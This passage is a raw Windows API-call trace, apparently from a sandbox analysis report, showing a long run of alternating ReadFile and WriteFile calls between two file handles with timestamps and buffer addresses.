lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.373] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.374] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.374] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.375] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.375] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.376] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.376] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x267, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.377] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.377] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.377] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.378] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.378] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.379] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.379] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.380] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.380] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.381] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.381] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.382] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.382] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.383] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.383] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.384] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.384] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x322, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.385] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.385] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x328, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.385] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.386] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.386] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.387] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.387] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.388] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.388] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.389] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.389] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.390] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.390] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.391] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.391] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.392] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.392] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.392] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.393] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.393] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.394] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.394] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.397] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.398] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.398] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.398] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.399] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.399] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.400] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.400] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.401] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.401] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.402] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.402] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x341, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.403] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.403] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.404] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.404] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.405] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.405] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.406] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.406] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.407] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.407] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.407] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.408] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.408] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.409] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.409] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.410] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.410] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.411] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.411] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.412] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.412] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.413] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.413] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.414] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.414] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.415] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.415] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.416] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.416] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.417] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.417] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.418] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.418] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.419] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.419] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.420] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.420] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.420] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.421] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.421] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.422] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, 